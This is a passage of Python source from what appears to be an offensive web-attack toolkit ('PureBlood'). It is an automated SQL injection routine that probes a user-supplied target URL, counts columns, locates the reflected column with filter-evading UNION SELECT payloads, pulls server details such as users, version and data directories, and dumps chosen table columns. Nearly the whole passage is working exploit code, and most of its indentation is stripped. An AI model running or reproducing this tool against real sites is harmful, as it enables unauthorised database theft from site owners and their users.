if re.compile(error).search(auto_sql_injection_request.text):
error = re.compile(error)
auto_sql_injection_request_result = 'Vulnerable1'
print ('[+] - Vulnerable: Database -> ({0})'.format(db))
if auto_sql_injection_request_result == '':
if auto_sql_injection_request_origin.text != auto_sql_injection_request.text:
auto_sql_injection_request_result = 'Vulnerable2'
print ('[+] - Vulnerable: NO Syntax Error')
elif auto_sql_injection_request.status_code == 403:
print ('[!] - Not Vulnerable!')
elif auto_sql_injection_request.status_code == 406:
print ('[!] - Not Vulnerable!')
if auto_sql_injection_request_result == 'Vulnerable1':
auto_sql_injection_request_ii = 0
auto_sql_injection_request_iii = ''
print ('[~] - Counting How Many Columns:')
auto_sql_injection_request_orderby = requests.get('{0}\' order by {1}--+'.format(url, '1'))
if ' order by 1--' in auto_sql_injection_request_orderby.text or 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err1'
else:
auto_sql_injection_orderby_result = ''
if auto_sql_injection_orderby_result == 'err1':
single_quote_payload = ''
else:
single_quote_payload = '\''
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, '100'))
if 'Unknown column' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err1'
elif 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err2'
else:
auto_sql_injection_orderby_result = 'err3'
for i in range(50):
if i == 0:
i = i + 1
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i)))
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
break
if auto_sql_injection_orderby_result == 'err1':
if 'Unknown column' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_orderby_result == 'err2':
if 'mysql_fetch_row()' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_orderby_result == 'err3':
if 'Unknown column' in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
for i in range(50):
if i == 0:
i = i + 1
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i)))
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
break
if auto_sql_injection_orderby_result == 'err1':
if 'Unknown column' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_orderby_result == 'err3':
if 'Unknown column' in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
print ('[!] - Not Able to Find How Many Columns!')
print ('')
web_application_attack()
print ('[~] - Columns: {0}'.format(str(auto_sql_injection_request_i - 1)))
for i in range(auto_sql_injection_request_i):
auto_sql_injection_request_ii = auto_sql_injection_request_ii + 1
if auto_sql_injection_request_ii == auto_sql_injection_request_i:
auto_sql_injection_request_ii = auto_sql_injection_request_ii - 1
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
break
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
auto_sql_injection_request_iii = auto_sql_injection_request_iii.replace(str(auto_sql_injection_request_ii) + ',' + str(auto_sql_injection_request_ii) + ',', str(auto_sql_injection_request_ii))
print ('')
print ('{2}[{1}#{2}] {3}- {4}Please put "-" after "=". Example: =-1337{0}'.format(reset + bold, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('Target> '))
if sys.version_info[0] == 2:
target = str(raw_input('Target> '))
print ('')
if 'http://' in target:
url = target
hostname = target.replace('http://', '')
elif 'https://' in target:
url = target
hostname = target.replace('https://', '')
if '://' not in target:
url = 'http://' + target
hostname = target
print ('[~] - Finding Vulnerable Column:')
auto_sql_injection_request_vulncolumn = requests.get('{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii))
auto_sql_injection_request_vulncolumn_soup = BeautifulSoup(auto_sql_injection_request_vulncolumn.content, 'html.parser')
auto_sql_injection_request_vulncolumn_nums = re.findall(r'\d+', str(auto_sql_injection_request_vulncolumn_soup))
auto_sql_injection_request_vulncolumn_possible_vulncolumn = []
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_nums:
if len(i) < 2:
auto_sql_injection_request_vulncolumn_possible_vulncolumn.append(i)
if i == 0:
pass
auto_sql_injection_request_vulncolumn_possible_vulncolumn = list(set(auto_sql_injection_request_vulncolumn_possible_vulncolumn))
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_possible_vulncolumn:
print ('\tTrying -> {0}'.format(str(i)))
auto_sql_injection_request_dios_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + i + ',', ',' + dios1 + ',')
auto_sql_injection_request_dios = requests.get(auto_sql_injection_request_dios_url)
if 'Table:' in auto_sql_injection_request_dios.text and 'id="PureBlood"' in auto_sql_injection_request_dios.text:
auto_sql_injection_request_dios_soup = BeautifulSoup(auto_sql_injection_request_dios.content, 'html.parser')
auto_sql_injection_request_dios_url = auto_sql_injection_request_dios_url
auto_sql_injection_request_vulncolumn_column = i
break
if not auto_sql_injection_request_vulncolumn_column:
print ('[!] - Not Able to Find The Vulnerable Column!')
print ('')
web_application_attack()
print ('[+] - Vulnerable Column: {0}'.format(str(auto_sql_injection_request_vulncolumn_column)))
auto_sql_injection_request_hostname_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_hostname + ',')
auto_sql_injection_request_tmpdir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_tmpdir + ',')
auto_sql_injection_request_datadir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_datadir + ',')
auto_sql_injection_request_version_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_version + ',')
auto_sql_injection_request_basedir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_basedir + ',')
auto_sql_injection_request_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_user + ',')
auto_sql_injection_request_database_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_database + ',')
auto_sql_injection_request_schema_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_schema + ',')
auto_sql_injection_request_uuid_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_uuid + ',')
auto_sql_injection_request_system_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_system_user + ',')
auto_sql_injection_request_session_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_session_user + ',')
auto_sql_injection_request_symlink_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_symlink + ',')
auto_sql_injection_request_ssl_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_ssl + ',')
auto_sql_injection_request_hostname = requests.get(auto_sql_injection_request_hostname_url)
auto_sql_injection_request_tmpdir = requests.get(auto_sql_injection_request_tmpdir_url)
auto_sql_injection_request_datadir = requests.get(auto_sql_injection_request_datadir_url)
auto_sql_injection_request_version = requests.get(auto_sql_injection_request_version_url)
auto_sql_injection_request_basedir = requests.get(auto_sql_injection_request_basedir_url)
auto_sql_injection_request_user = requests.get(auto_sql_injection_request_user_url)
auto_sql_injection_request_database = requests.get(auto_sql_injection_request_database_url)
auto_sql_injection_request_schema = requests.get(auto_sql_injection_request_schema_url)
auto_sql_injection_request_uuid = requests.get(auto_sql_injection_request_uuid_url)
auto_sql_injection_request_system_user = requests.get(auto_sql_injection_request_system_user_url)
auto_sql_injection_request_session_user = requests.get(auto_sql_injection_request_session_user_url)
auto_sql_injection_request_symlink = requests.get(auto_sql_injection_request_symlink_url)
auto_sql_injection_request_ssl = requests.get(auto_sql_injection_request_ssl_url)
sqli_hostname_soup = BeautifulSoup(auto_sql_injection_request_hostname.text, 'html.parser')
sqli_tmpdir_soup = BeautifulSoup(auto_sql_injection_request_tmpdir.text, 'html.parser')
sqli_datadir_soup = BeautifulSoup(auto_sql_injection_request_datadir.text, 'html.parser')
sqli_version_soup = BeautifulSoup(auto_sql_injection_request_version.text, 'html.parser')
sqli_basedir_soup = BeautifulSoup(auto_sql_injection_request_basedir.text, 'html.parser')
sqli_user_soup = BeautifulSoup(auto_sql_injection_request_user.text, 'html.parser')
sqli_database_soup = BeautifulSoup(auto_sql_injection_request_database.text, 'html.parser')
sqli_schema_soup = BeautifulSoup(auto_sql_injection_request_schema.text, 'html.parser')
sqli_uuid_soup = BeautifulSoup(auto_sql_injection_request_uuid.text, 'html.parser')
sqli_system_user_soup = BeautifulSoup(auto_sql_injection_request_system_user.text, 'html.parser')
sqli_session_user_soup = BeautifulSoup(auto_sql_injection_request_session_user.text, 'html.parser')
sqli_symlink_soup = BeautifulSoup(auto_sql_injection_request_symlink.text, 'html.parser')
sqli_ssl_soup = BeautifulSoup(auto_sql_injection_request_ssl.text, 'html.parser')
sqli_hostname = sqli_hostname_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_tmpdir = sqli_tmpdir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_datadir = sqli_datadir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_version = sqli_version_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_basedir = sqli_basedir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_user = sqli_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_database = sqli_database_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_schema = sqli_schema_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_uuid = sqli_uuid_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_system_user = sqli_system_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_session_user = sqli_session_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_symlink = sqli_symlink_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_ssl = sqli_ssl_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
print ('[+] Hostname: {0}'.format(sqli_hostname))
print ('[+] TMP Directory: {0}'.format(sqli_tmpdir))
print ('[+] Data Directory: {0}'.format(sqli_datadir))
print ('[+] Database Version: {0}'.format(sqli_version))
print ('[+] Base Directory: {0}'.format(sqli_basedir))
print ('[+] Current User: {0}'.format(sqli_user))
print ('[+] Current Database: {0}'.format(sqli_database))
print ('[+] Current Schema: {0}'.format(sqli_schema))
print ('[+] System UUID Key: {0}'.format(sqli_uuid))
print ('[+] Current System User: {0}'.format(sqli_system_user))
print ('[+] Session User: {0}'.format(sqli_session_user))
print ('[+] Is Symlink Enabled?: {0}'.format(sqli_symlink))
print ('[+] Is SSL Enabled?: {0}'.format(sqli_ssl))
print ('')
print ('[~] Dumping Database:')
auto_sql_injection_request_dios_soup_pureblood = auto_sql_injection_request_dios_soup.findAll('strong', attrs={'id': 'PureBlood'})
auto_sql_injection_request_dios_soup_pureblood_list = []
for i in auto_sql_injection_request_dios_soup_pureblood:
if i.text in auto_sql_injection_request_dios_soup_pureblood_list:
pass
else:
auto_sql_injection_request_dios_soup_pureblood_list.append(i.text)
for i in auto_sql_injection_request_dios_soup_pureblood_list:
print ('\t{0}'.format(i))
print ('')
sqli_table = ''
user_choice = ''
sqli_column = []
print ('{2}[{1}#{2}] {3}- {4}Just enter exit/done if you want to start dumping{0}'.format(reset + bold, green, blue, yellow, cyan))
while True:
if sys.version_info[0] == 3:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(input('Table> '))
sqli_table = user_choice1
user_choice = str(input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
if sys.version_info[0] == 2:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(raw_input('Table> '))
sqli_table = user_choice1
user_choice = str(raw_input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
print ('')
print ('[~] Dumping Columns:')
for i in sqli_column:
auto_sql_injection_request_column_dump_list = []
auto_sql_injection_request_column_dump_url = '{0}{1} /*!50000Union*/ all select {2} from {3}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii, sqli_table)
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_dump_column_payload + ',')
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace('<column>', i)
auto_sql_injection_request_column_dump = requests.get(auto_sql_injection_request_column_dump_url)
auto_sql_injection_request_column_dump_soup = BeautifulSoup(auto_sql_injection_request_column_dump.text, 'html.parser')
auto_sql_injection_request_column_dump_soup_pureblood = auto_sql_injection_request_column_dump_soup.find_all('strong', attrs={'id': 'PureBloodINFO'})
for ii in auto_sql_injection_request_column_dump_soup_pureblood:
if ii.text in auto_sql_injection_request_column_dump_list:
pass
elif ii.text not in auto_sql_injection_request_column_dump_list:
auto_sql_injection_request_column_dump_list.append(ii.text)
for iii in auto_sql_injection_request_column_dump_list:
print ('\t{0} -> {1}'.format(i, iii))
elif auto_sql_injection_request_result == 'Vulnerable2': # error_output() == False
auto_sql_injection_request_ii = 0
auto_sql_injection_request_iii = ''
print ('[~] - Counting How Many Columns:')
auto_sql_injection_request_orderby = requests.get('{0}\' order by {1}--+'.format(url, '1'))
auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser')
if 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err1'
print ('YES')
else:
auto_sql_injection_orderby_result = ''
if auto_sql_injection_orderby_result == 'err1':
single_quote_payload = ''
else:
single_quote_payload = '\''
for i in range(50):
if i == 0:
i = i + 1
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i)))
auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser')
auto_sql_injection_request_orderby_html_h1 = auto_sql_injection_request_orderby_html.find_all('h1')
auto_sql_injection_request_orderby_html_h2 = auto_sql_injection_request_orderby_html.find_all('h2')
auto_sql_injection_request_orderby_html_h3 = auto_sql_injection_request_orderby_html.find_all('h3')
auto_sql_injection_request_orderby_html_p = auto_sql_injection_request_orderby_html.find_all('p')
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
break
if auto_sql_injection_request_origin_html_h1 != auto_sql_injection_request_orderby_html_h1:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h2 != auto_sql_injection_request_orderby_html_h2:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h3 != auto_sql_injection_request_orderby_html_h3:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_p != auto_sql_injection_request_orderby_html_p:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
for i in range(50):
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} group by {2}--+'.format(url, single_quote_payload, str(i)))
auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser')
auto_sql_injection_request_orderby_html_h1 = auto_sql_injection_request_orderby_html.find_all('h1')
auto_sql_injection_request_orderby_html_h2 = auto_sql_injection_request_orderby_html.find_all('h2')
auto_sql_injection_request_orderby_html_h3 = auto_sql_injection_request_orderby_html.find_all('h3')
auto_sql_injection_request_orderby_html_p = auto_sql_injection_request_orderby_html.find_all('p')
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
print ('[!] - Not Vulnerable!')
print ('')
web_application_attack()
if auto_sql_injection_request_origin_html_h1 != auto_sql_injection_request_orderby_html_h1:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h2 != auto_sql_injection_request_orderby_html_h2:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h3 != auto_sql_injection_request_orderby_html_h3:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_p != auto_sql_injection_request_orderby_html_p:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
print ('[!] - Not Able to Find How Many Columns!')
print ('')
web_application_attack()
print ('[+] - Columns: {0}'.format(str(auto_sql_injection_request_i - 1)))
for i in range(auto_sql_injection_request_i):
auto_sql_injection_request_ii = auto_sql_injection_request_ii + 1
if auto_sql_injection_request_ii == auto_sql_injection_request_i:
auto_sql_injection_request_ii = auto_sql_injection_request_ii - 1
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
break
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
auto_sql_injection_request_iii = auto_sql_injection_request_iii.replace(str(auto_sql_injection_request_ii) + ',' + str(auto_sql_injection_request_ii) + ',', str(auto_sql_injection_request_ii))
print ('')
print ('{2}[{1}#{2}] {3}- {4}Please put "-" after "=". Example: =-1337{0}'.format(reset + bold, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('Target> '))
if sys.version_info[0] == 2:
target = str(raw_input('Target> '))
print ('')
if 'http://' in target:
url = target
hostname = target.replace('http://', '')
elif 'https://' in target:
url = target
hostname = target.replace('https://', '')
if '://' not in target:
url = 'http://' + target
hostname = target
print ('[~] - Finding Vulnerable Column:')
auto_sql_injection_request_vulncolumn = requests.get('{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii))
auto_sql_injection_request_vulncolumn_soup = BeautifulSoup(auto_sql_injection_request_vulncolumn.content, 'html.parser')
        auto_sql_injection_request_vulncolumn_nums = re.findall(r'\d+', str(auto_sql_injection_request_vulncolumn_soup))
auto_sql_injection_request_vulncolumn_possible_vulncolumn = []
auto_sql_injection_request_vulncolumn_column = ''
        for i in auto_sql_injection_request_vulncolumn_nums:
            if i == '0':
                continue
            if len(i) < 2:
                auto_sql_injection_request_vulncolumn_possible_vulncolumn.append(i)
auto_sql_injection_request_vulncolumn_possible_vulncolumn = list(set(auto_sql_injection_request_vulncolumn_possible_vulncolumn))
auto_sql_injection_request_vulncolumn_column = ''
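        # Swap each candidate column for the DIOS payload (dios1); the marker id="PureBlood" in the
        # response confirms which column is actually reflected on the page.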
for i in auto_sql_injection_request_vulncolumn_possible_vulncolumn:
print ('\tTrying -> {0}'.format(str(i)))
auto_sql_injection_request_dios_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + i + ',', ',' + dios1 + ',')
auto_sql_injection_request_dios = requests.get(auto_sql_injection_request_dios_url)
if 'Table:' in auto_sql_injection_request_dios.text and 'id="PureBlood"' in auto_sql_injection_request_dios.text:
auto_sql_injection_request_dios_soup = BeautifulSoup(auto_sql_injection_request_dios.content, 'html.parser')
auto_sql_injection_request_dios_url = auto_sql_injection_request_dios_url
auto_sql_injection_request_vulncolumn_column = i
break
if not auto_sql_injection_request_vulncolumn_column:
print ('[!] - Not Vulnerable!')
print ('')
web_application_attack()
print ('[+] - Vulnerable Column: {0}'.format(str(auto_sql_injection_request_vulncolumn_column)))
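        # Re-use the working UNION SELECT, replacing the reflected column with one server variable/function
        # at a time (hostname, tmpdir, datadir, version, basedir, users, database, schema, UUID, symlink, SSL).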
auto_sql_injection_request_hostname_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_hostname + ',')
auto_sql_injection_request_tmpdir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_tmpdir + ',')
auto_sql_injection_request_datadir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_datadir + ',')
auto_sql_injection_request_version_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_version + ',')
auto_sql_injection_request_basedir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_basedir + ',')
auto_sql_injection_request_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_user + ',')
auto_sql_injection_request_database_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_database + ',')
auto_sql_injection_request_schema_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_schema + ',')
auto_sql_injection_request_uuid_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_uuid + ',')
auto_sql_injection_request_system_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_system_user + ',')
auto_sql_injection_request_session_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_session_user + ',')
auto_sql_injection_request_symlink_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_symlink + ',')
auto_sql_injection_request_ssl_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_ssl + ',')
auto_sql_injection_request_hostname = requests.get(auto_sql_injection_request_hostname_url)
auto_sql_injection_request_tmpdir = requests.get(auto_sql_injection_request_tmpdir_url)
auto_sql_injection_request_datadir = requests.get(auto_sql_injection_request_datadir_url)
auto_sql_injection_request_version = requests.get(auto_sql_injection_request_version_url)
auto_sql_injection_request_basedir = requests.get(auto_sql_injection_request_basedir_url)
auto_sql_injection_request_user = requests.get(auto_sql_injection_request_user_url)
auto_sql_injection_request_database = requests.get(auto_sql_injection_request_database_url)
auto_sql_injection_request_schema = requests.get(auto_sql_injection_request_schema_url)
auto_sql_injection_request_uuid = requests.get(auto_sql_injection_request_uuid_url)
auto_sql_injection_request_system_user = requests.get(auto_sql_injection_request_system_user_url)
auto_sql_injection_request_session_user = requests.get(auto_sql_injection_request_session_user_url)
auto_sql_injection_request_symlink = requests.get(auto_sql_injection_request_symlink_url)
auto_sql_injection_request_ssl = requests.get(auto_sql_injection_request_ssl_url)
sqli_hostname_soup = BeautifulSoup(auto_sql_injection_request_hostname.text, 'html.parser')
sqli_tmpdir_soup = BeautifulSoup(auto_sql_injection_request_tmpdir.text, 'html.parser')
sqli_datadir_soup = BeautifulSoup(auto_sql_injection_request_datadir.text, 'html.parser')
sqli_version_soup = BeautifulSoup(auto_sql_injection_request_version.text, 'html.parser')
sqli_basedir_soup = BeautifulSoup(auto_sql_injection_request_basedir.text, 'html.parser')
sqli_user_soup = BeautifulSoup(auto_sql_injection_request_user.text, 'html.parser')
sqli_database_soup = BeautifulSoup(auto_sql_injection_request_database.text, 'html.parser')
sqli_schema_soup = BeautifulSoup(auto_sql_injection_request_schema.text, 'html.parser')
sqli_uuid_soup = BeautifulSoup(auto_sql_injection_request_uuid.text, 'html.parser')
sqli_system_user_soup = BeautifulSoup(auto_sql_injection_request_system_user.text, 'html.parser')
sqli_session_user_soup = BeautifulSoup(auto_sql_injection_request_session_user.text, 'html.parser')
sqli_symlink_soup = BeautifulSoup(auto_sql_injection_request_symlink.text, 'html.parser')
sqli_ssl_soup = BeautifulSoup(auto_sql_injection_request_ssl.text, 'html.parser')
sqli_hostname = sqli_hostname_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_tmpdir = sqli_tmpdir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_datadir = sqli_datadir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_version = sqli_version_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_basedir = sqli_basedir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_user = sqli_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_database = sqli_database_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_schema = sqli_schema_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_uuid = sqli_uuid_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_system_user = sqli_system_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_session_user = sqli_session_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_symlink = sqli_symlink_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_ssl = sqli_ssl_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
print ('[+] Hostname: {0}'.format(sqli_hostname))
print ('[+] TMP Directory: {0}'.format(sqli_tmpdir))
print ('[+] Data Directory: {0}'.format(sqli_datadir))
print ('[+] Database Version: {0}'.format(sqli_version))
print ('[+] Base Directory: {0}'.format(sqli_basedir))
print ('[+] Current User: {0}'.format(sqli_user))
print ('[+] Current Database: {0}'.format(sqli_database))
print ('[+] Current Schema: {0}'.format(sqli_schema))
print ('[+] System UUID Key: {0}'.format(sqli_uuid))
print ('[+] Current System User: {0}'.format(sqli_system_user))
print ('[+] Session User: {0}'.format(sqli_session_user))
        print ('[+] Is Symlink Enabled?: {0}'.format(sqli_symlink))
print ('[+] Is SSL Enabled?: {0}'.format(sqli_ssl))
print ('')
print ('[~] Dumping Database:')
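        # The DIOS response carries the Table:/Column: listing inside <strong id="PureBlood"> tags;
        # collect the unique entries and show them to the user.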
auto_sql_injection_request_dios_soup_pureblood_list = []
auto_sql_injection_request_dios_soup_pureblood = auto_sql_injection_request_dios_soup.findAll('strong', attrs={'id': 'PureBlood'})
for i in auto_sql_injection_request_dios_soup_pureblood:
if i.text in auto_sql_injection_request_dios_soup_pureblood_list:
pass
else:
